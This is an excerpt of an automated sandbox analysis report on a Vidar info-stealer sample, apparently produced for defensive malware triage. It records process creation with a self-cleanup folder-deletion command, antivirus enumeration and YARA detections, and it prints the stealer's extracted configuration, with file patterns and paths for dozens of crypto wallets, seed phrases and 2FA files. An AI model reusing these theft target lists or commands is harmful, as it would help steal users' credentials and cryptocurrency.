                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA1244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00FA1244
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA1D45 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00FA1D45
                    Source: Buyer.pifBinary or memory string: Shell_TrayWnd
                    Source: file.exe, 00000000.00000003.1990077171.000000000295F000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp, Buyer.pif, 0000000B.00000000.2022496632.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F609E8 cpuid 11_2_00F609E8
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F9E4B6 GetLocalTime,11_2_00F9E4B6
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F9E514 GetUserNameW,11_2_00F9E514
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F7BCA2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00F7BCA2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.Buyer.pif.1354718.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Buyer.pif.1354718.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Buyer.pif.40f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
